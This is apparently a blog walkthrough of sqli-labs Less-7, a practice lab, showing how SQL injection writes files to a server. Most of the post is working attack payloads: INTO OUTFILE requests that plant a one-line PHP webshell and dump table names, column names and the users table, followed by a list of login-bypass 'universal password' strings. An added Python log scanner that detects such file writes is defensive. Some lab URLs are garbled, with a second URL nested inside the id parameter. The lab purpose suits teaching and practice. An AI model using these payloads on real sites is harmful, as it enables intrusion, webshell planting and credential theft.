sqli-labs7

Less-7: single-quote injection with double parentheses:

Levels 1-6 return error information. First choose one of those levels and use error-based injection to find the website's absolute path; @@datadir returns the database data storage path and @@basedir returns the MySQL installation path:

It is very difficult to obtain the absolute path of the website in practice.
Read and write permission test:
MySQL controls user access to databases through privilege tables, which are stored in the mysql database. The main privilege tables are user, db, host, tables_priv, columns_priv and procs_priv.

The page returns normally, so read permission is available.
localhost:81/sqli-labs/Less-7/?id=-1')) union select 1,2,3 into outfile "H:\xampp\htdocs\sqli-labs\Less-7\test.txt" -- #

Although the page reports an error, the server's file system shows that test.txt has been generated. UNION is a combined query, so it makes little difference whether id is 1 or -1.
A backslash in the payload is treated as an escape character, so \\ is used here and the result is \.

Write a one-line webshell ("one-sentence Trojan") directly:
http://localhost:81/sqli-labs/Less-7/?id=1%27))%20union%20select%201,2,%27%3C?php%20@eval($_POST[%22pass%22])%20?%3E%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\test.php%22%20--%20#

Because PHP is a server-side language, the PHP source code is not visible when the file is requested from a browser.
Determine the number of columns:
http://localhost:81/sqli-labs/Less-7/?id=1%27))%20order%20by%203%20--%20#

Use into outfile to write out the user name and database name:
http://localhost:81/sqli-labs/Less-7/?id=-1%27))%20union%20select%201,user(),database()%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\1.txt%22%20--%20#

View the table names:
http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%201,2,table_name%20from%20information_schema.tables%20where%20table_schema=%27security%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\biao.txt%22%20--%20#

Look up the columns:
http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%201,2,column_name%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\ziduan.txt%22%20--%20#

View the data in the users table:
http://localhost:81/sqli-labs/Less-7/?id=http://192.168.33.1/sqli/Less-7/?id=-1%27))%20union%20select%20*%20from%20users%20into%20outfile%20%22H:\xampp\htdocs\sqli-labs\Less-7\users.txt%22%20--%20#
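
The requests above as they look from the defender's side, in an added example that is not part of the original post: a small Python scanner that flags access-log requests whose query string carries INTO OUTFILE or INTO DUMPFILE followed by a quoted path. The log lines are constructed for the demo, and the function names and severity labels are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (combined log format); addresses and times are made up.
SAMPLE_LOG = [
    '127.0.0.1 - - [01/Dec/2020:10:00:01 +0800] "GET /sqli-labs/Less-7/?id=1 HTTP/1.1" 200 721',
    '127.0.0.1 - - [01/Dec/2020:10:00:09 +0800] "GET /sqli-labs/Less-7/?id=1%27))%20order%20by%203%20--%20 HTTP/1.1" 200 721',
    '127.0.0.1 - - [01/Dec/2020:10:01:30 +0800] "GET /sqli-labs/Less-7/?id=-1%27))%20union%20select%201,2,3%20into%20outfile%20%22H:%5C%5Cxampp%5C%5Chtdocs%5C%5Csqli-labs%5C%5CLess-7%5C%5Ctest.txt%22%20--%20 HTTP/1.1" 200 734',
    '127.0.0.1 - - [01/Dec/2020:10:02:12 +0800] "GET /sqli-labs/Less-7/?id=1%27))%20UNION%20SELECT%201,2,%27PLACEHOLDER%27%20INTO%20OUTFILE%20%22H:%5C%5Cxampp%5C%5Chtdocs%5C%5Csqli-labs%5C%5CLess-7%5C%5Ctest.php%22%20--%20 HTTP/1.1" 200 734',
    '127.0.0.1 - - [01/Dec/2020:10:03:00 +0800] "GET /search.php?q=mysql+select+into+outfile+manual HTTP/1.1" 200 1024',
]

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# INTO OUTFILE / INTO DUMPFILE followed by a quoted file path
WRITE = re.compile(r"\binto\s+(outfile|dumpfile)\s*['\"]([^'\"]+)['\"]", re.I)
SCRIPT_EXT = (".php", ".phtml", ".jsp", ".asp", ".aspx")

def normalize(query):
    """Percent-decode the query string and collapse runs of whitespace."""
    return re.sub(r"\s+", " ", unquote_plus(query))

def scan(lines):
    """Return (line_no, keyword, path, severity) for each request that attempts a file write."""
    hits = []
    for no, line in enumerate(lines, 1):
        req = REQUEST.search(line)
        if not req:
            continue  # not an HTTP request line
        found = WRITE.search(normalize(urlsplit(req.group(1)).query))
        if found:
            path = found.group(2)
            # A server-side script as the target means the write can become code execution.
            severity = "high" if path.lower().endswith(SCRIPT_EXT) else "medium"
            hits.append((no, found.group(1).lower(), path, severity))
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The search request on the last sample line is not flagged, because the keywords are not followed by a quoted path.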

Tips: Universal Password

Operator precedence: arithmetic > relational > assignment > logical
= binds tighter than and, and and binds tighter than or
Select… from… where user='admin' and password='2' or '1';
The two values are combined with a logical OR, so the condition of the SQL statement evaluates to true, which means authentication succeeds and the login goes through.
asp aspx universal password
"or "a"="a
')or('a'='a
or 1=1
'or 1=1--
a'or' 1=1--
"or 1=1
'or' a'='a
"or"="a'='a
'or''='
'or'='or'
1 or '1'='1'=1
1 or '1'='1' or 1=1
'OR 1=1%00
"or 1=1%00
'xor
PHP universal password
'or 1=1/*
User: something
Pass: 'OR '1'='1
jsp universal password
1'or'1'='1
admin' OR 1=1/*

Origin blog.csdn.net/qq_38989921/article/details/110225921